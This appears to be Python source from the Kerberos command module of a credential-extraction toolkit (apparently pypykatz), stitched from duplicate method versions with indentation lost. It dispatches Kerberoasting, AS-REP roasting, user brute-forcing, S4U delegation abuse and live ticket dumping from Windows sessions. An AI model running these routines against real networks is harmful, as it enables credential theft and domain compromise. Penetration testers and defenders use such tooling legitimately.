def run_live(self, args):
if platform.system() != 'Windows':
print('[-]This command only works on Windows!')
return
from pypykatz.kerberos.kerberoslive import KerberosLive, live_roast # , purge, list_sessions #get_tgt, get_tgs
kl = KerberosLive()
if args.live_kerberos_module == 'roast':
res, errors, err = asyncio.run(live_roast(args.out_file))
if err is not None:
print('[LIVE][KERBEROS][ROAST] Error while roasting tickets! Reason: %s' % geterr(err))
return
if args.out_file is None:
for r in res:
print(r)
elif args.live_kerberos_module == 'tgt':
ticket = kl.get_tgt(args.target)
if args.out_file is None:
print_kirbi(ticket)
return
with open(args.out_file, 'wb') as f:
f.write(ticket)
elif args.live_kerberos_module == 'apreq':
apreq, sessionkey = kl.get_apreq(args.target)
print('APREQ b64: ')
print(format_kirbi(apreq.dump()))
print('Sessionkey b64: %s' % base64.b64encode(sessionkey).decode())
elif args.live_kerberos_module == 'currentluid':
print(hex(kl.get_current_luid()))
elif args.live_kerberos_module == 'purge':
luid = None
if args.luid is not None:
luid = args.luid
if luid.startswith('0x') is True:
luid = int(luid, 16)
luid=int(luid)
kl.purge(luid)
print('Tickets purged!')
elif args.live_kerberos_module == 'sessions':
kl.list_sessions()
elif args.live_kerberos_module == 'triage':
if args.luid is None:
ticketinfos = kl.get_all_ticketinfo()
else:
luid = KerberosCMDHelper.luid_converter(args.luid)
ticketinfos = kl.get_ticketinfo(luid)
table = [['LUID', 'ServerName', 'RealmName', 'StartTime', 'EndTime', 'RenewTime', 'EncryptionType', 'TicketFlags']]
for luid in ticketinfos:
if len(ticketinfos[luid]) == 0:
continue
for ticket in ticketinfos[luid]:
table.append([
hex(luid),
ticket['ServerName'],
ticket['RealmName'],
filetime_to_dt(ticket['StartTime']).isoformat(),
filetime_to_dt(ticket['EndTime']).isoformat(),
filetime_to_dt(ticket['RenewTime']).isoformat(),
str(ticket['EncryptionType']),
str(ticket['TicketFlags'])
])
print_table(table)
elif args.live_kerberos_module == 'dump':
if args.luid is None:
tickets = kl.export_all_ticketdata()
else:
luid = KerberosCMDHelper.luid_converter(args.luid)
tickets = kl.export_ticketdata(luid)
if args.outdir is not None:
for luid in tickets:
for ticket in tickets[luid]:
with open(args.outdir + 'ticket_%s.kirbi' % 'a', 'wb') as f:
f.write(ticket['Ticket'])
else:
for luid in tickets:
if len(tickets[luid]) == 0:
continue
print('LUID @%s' % hex(luid))
for ticket in tickets[luid]:
print_kirbi(ticket['Ticket'])
def run(self, args):
#raise NotImplementedError('Platform independent kerberos not implemented!')
if args.kerberos_module == 'tgt':
kirbi, filename, err = asyncio.run(get_TGT(args.url))
if err is not None:
print('[KERBEROS][TGT] Failed to fetch TGT! Reason: %s' % err)
return
if args.out_file is not None:
with open(args.out_file, 'wb') as f:
f.write(kirbi.dump())
else:
print_kirbi(kirbi)
elif args.kerberos_module == 'tgs':
tgs, encTGSRepPart, key, err = asyncio.run(get_TGS(args.url, args.spn))
if err is not None:
print('[KERBEROS][TGS] Failed to fetch TGS! Reason: %s' % err)
return
if args.out_file is not None:
pass
else:
print(tgs)
print(encTGSRepPart)
print(key)
elif args.kerberos_module == 'brute':
target_spns = generate_targets(args.targets, args.domain)
_, err = asyncio.run(brute(args.address, target_spns, args.out_file, args.show_negatives))
if err is not None:
print('[KERBEROS][BRUTE] Error while enumerating users! Reason: %s' % geterr(err))
return
elif args.kerberos_module == 'asreproast':
target_spns = generate_targets(args.targets, args.domain, to_spn = False)
_, err = asyncio.run(asreproast(args.address, target_spns, out_file = args.out_file, etype = args.etype))
if err is not None:
print('[KERBEROS][ASREPROAST] Error while enumerating users! Reason: %s' % geterr(err))
return
elif args.kerberos_module == 'spnroast':
target_spns = generate_targets(args.targets, args.domain, to_spn = True)
_, err = asyncio.run(spnroast(args.url, target_spns, out_file = args.out_file, etype = args.etype))
if err is not None:
print('[KERBEROS][SPNROAST] Error while enumerating users! Reason: %s' % geterr(err))
return
elif args.kerberos_module == 's4u':
tgs, encTGSRepPart, key, err = asyncio.run(s4u(args.url, args.spn, args.targetuser, out_file = None))
if err is not None:
print('[KERBEROS][S4U] Error while enumerating users! Reason: %s' % geterr(err))
return
elif args.kerberos_module == 'keytab':
process_keytab(args.keytabfile)
elif args.kerberos_module == 'ccache':
if args.ccache_module == 'list':
list_ccache(args.ccachefile)
elif args.ccache_module == 'roast':
roast_ccache(args.ccachefile, args.out_file)
elif args.ccache_module == 'del':
del_ccache(args.ccachefile, args.index)
elif args.ccache_module == 'exportkirbi':
ccache_to_kirbi(args.ccachefile, args.kirbidir)
elif args.ccache_module == 'loadkirbi':
kirbi_to_ccache(args.ccachefile, args.kirbi)
elif args.kerberos_module == 'kirbi':
if args.kirbi_module == 'parse':
parse_kirbi(args.kirbifile)
def run(self, args):
if args.kerberos_module == 'tgt':
kirbi, err = asyncio.run(get_TGT(args.url, override_etype = args.etype))
if err is not None:
print('[KERBEROS][TGT] Failed to fetch TGT! Reason: %s' % err)
return
if args.out_file is not None:
with open(args.out_file, 'wb') as f:
f.write(kirbi.dump())
else:
print_kirbi(kirbi)
elif args.kerberos_module == 'tgs':
tgs, encTGSRepPart, key, kirbi, err = asyncio.run(get_TGS(args.url, args.spn, override_etype = args.etype))
if err is not None:
print('[KERBEROS][TGS] Failed to fetch TGS! Reason: %s' % err)
return
if args.out_file is not None:
with open(args.out_file, 'wb') as f:
f.write(kirbi.dump())
else:
print_kirbi(kirbi)
elif args.kerberos_module == 'brute':
target_spns = generate_targets(args.targets, args.domain)
_, err = asyncio.run(brute(args.address, target_spns, args.out_file, args.show_negatives))
if err is not None:
print('[KERBEROS][BRUTE] Error while enumerating users! Reason: %s' % geterr(err))
return
elif args.kerberos_module == 'asreproast':
if args.ldap is None:
target_spns = generate_targets(args.targets, args.domain, to_spn = False)
else:
target_spns, _ = asyncio.run(get_ldap_kerberos_targets(args.ldap, target_type = 'asrep'))
_, err = asyncio.run(asreproast(args.address, target_spns, out_file = args.out_file, etype = args.etype))
if err is not None:
print('[KERBEROS][ASREPROAST] Error! Reason: %s' % geterr(err))
return
elif args.kerberos_module == 'spnroast':
if args.ldap is None and args.targets is None:
raise Exception('Either LDAP URL or targets must be provided')
if args.ldap is None:
target_spns = generate_targets(args.targets, args.domain, to_spn = True)
else:
_, target_spns = asyncio.run(get_ldap_kerberos_targets(args.ldap, target_type = 'spn'))
_, err = asyncio.run(spnroast(args.url, target_spns, out_file = args.out_file, etype = args.etype))
if err is not None:
print('[KERBEROS][SPNROAST] Error! Reason: %s' % geterr(err))
return
elif args.kerberos_module == 's4u':
tgs, encTGSRepPart, key, kirbi, err = asyncio.run(s4u(args.url, args.spn, args.targetuser))
if err is not None:
print('[KERBEROS][S4U] Error! Reason: %s' % geterr(err))
return
if args.out_file is not None:
with open(args.out_file, 'wb') as f:
f.write(kirbi.dump())
else:
print_kirbi(kirbi)
elif args.kerberos_module == 'keytab':
process_keytab(args.keytabfile)
elif args.kerberos_module == 'ccache':
if args.ccache_module == 'list':
list_ccache(args.ccachefile)
elif args.ccache_module == 'roast':
roast_ccache(args.ccachefile, args.out_file)
elif args.ccache_module == 'del':
del_ccache(args.ccachefile, args.index)
elif args.ccache_module == 'exportkirbi':
ccache_to_kirbi(args.ccachefile, args.kirbidir)
elif args.ccache_module == 'loadkirbi':
kirbi_to_ccache(args.ccachefile, args.kirbi)
elif args.kerberos_module == 'kirbi':
if args.kirbi_module == 'parse':
parse_kirbi(args.kirbifile)